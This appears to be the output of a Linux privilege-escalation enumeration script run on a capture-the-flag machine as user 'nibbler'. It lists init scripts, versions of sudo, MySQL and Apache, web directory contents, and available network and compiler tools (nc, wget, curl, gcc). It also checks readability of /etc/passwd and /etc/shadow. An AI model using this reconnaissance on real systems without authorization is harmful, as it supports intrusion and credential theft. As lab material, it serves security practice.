-rwxr-xr-x  1 root root 1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x  1 root root  711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root 2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x  1 root root 5607 Feb  3  2017 mysql
-rwxr-xr-x  1 root root 4771 Jul 19  2015 networking
-rwxr-xr-x  1 root root 1581 Oct 15  2015 ondemand
-rwxr-xr-x  1 root root 2503 Mar 29  2016 open-iscsi
-rwxr-xr-x  1 root root 1578 Mar 29  2016 open-vm-tools
-rwxr-xr-x  1 root root 1366 Nov 15  2015 plymouth
-rwxr-xr-x  1 root root  752 Nov 15  2015 plymouth-log
-rwxr-xr-x  1 root root 1192 Sep  6  2015 procps
-rwxr-xr-x  1 root root 6366 Jan 19  2016 rc
-rwxr-xr-x  1 root root  820 Jan 19  2016 rc.local
-rwxr-xr-x  1 root root  117 Jan 19  2016 rcS
-rwxr-xr-x  1 root root  661 Jan 19  2016 reboot
-rwxr-xr-x  1 root root 4149 Nov 23  2015 resolvconf
-rwxr-xr-x  1 root root 4355 Jul 10  2014 rsync
-rwxr-xr-x  1 root root 2796 Feb  3  2016 rsyslog
-rwxr-xr-x  1 root root 1226 Jun  9  2015 screen-cleanup
-rwxr-xr-x  1 root root 3927 Jan 19  2016 sendsigs
-rwxr-xr-x  1 root root  597 Jan 19  2016 single
-rw-r--r--  1 root root 1087 Jan 19  2016 skeleton
-rwxr-xr-x  1 root root 4077 Apr 27  2016 ssh
-rwxr-xr-x  1 root root 6087 Apr 12  2016 udev
-rwxr-xr-x  1 root root 2049 Aug  7  2014 ufw
-rwxr-xr-x  1 root root 2737 Jan 19  2016 umountfs
-rwxr-xr-x  1 root root 2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x  1 root root 1879 Jan 19  2016 umountroot
-rwxr-xr-x  1 root root 1391 Apr 20  2017 unattended-upgrades
-rwxr-xr-x  1 root root 3111 Jan 19  2016 urandom
-rwxr-xr-x  1 root root 1306 May 26  2016 uuidd


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using  EditLine wrapper


[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2017-09-18T15:09:02


[-] Apache user configuration:
APACHE_RUN_USER=nibbler
APACHE_RUN_GROUP=nibbler


[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 setenvif_module (shared)
 status_module (shared)


[-] www home dir contents:
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Dec 10  2017 .
drwxr-xr-x 14 root root 4.0K Dec 10  2017 ..
drwxr-xr-x  3 root root 4.0K Dec 28 15:22 html

/var/www/html:
total 16K
drwxr-xr-x 3 root    root    4.0K Dec 28 15:22 .
drwxr-xr-x 3 root    root    4.0K Dec 10  2017 ..
-rw-r--r-- 1 root    root      93 Dec 28 15:19 index.html
d-wx-wx--x 7 nibbler nibbler 4.0K Dec 28 08:55 nibbleblog


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[-] Installed compilers:
ii  g++                                 4:5.3.1-1ubuntu1                           amd64        GNU C++ compiler
ii  g++-5                               5.4.0-6ubuntu1~16.04.5                     amd64        GNU C++ compiler
ii  gcc                                 4:5.3.1-1ubuntu1                           amd64        GNU C compiler
ii  gcc-5                               5.4.0-6ubuntu1~16.04.5                     amd64        GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1607 Dec 10  2017 /etc/passwd
-rw-r--r-- 1 root root 772 Dec 10  2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1069 Dec 10  2017 /etc/shadow


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 350 Sep 22  2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 2084 Sep  6  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 338 Nov 18  2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 14867 Apr 12  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 8464 Dec 10  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 144 Sep 22  2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 3028 Jul 19  2016 /etc/adduser.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 191 Jan 18  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 100 Nov 25  2015 /etc/sos.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 6816 May 11  2017 /etc/overlayroot.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 1371 Jan 27  2016 /etc/rsyslog.conf


[-] Current user's history files:
-rw------- 1 nibbler nibbler 0 Dec 29 05:29 /home/nibbler/.bash_history


[-] Location and contents (if accessible) of .bash_history file(s):
/home/nibbler/.bash_history


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Dec 10  2017 .
drwxr-xr-x 14 root root 4096 Dec 10  2017 ..


### SCAN COMPLETE ####################################

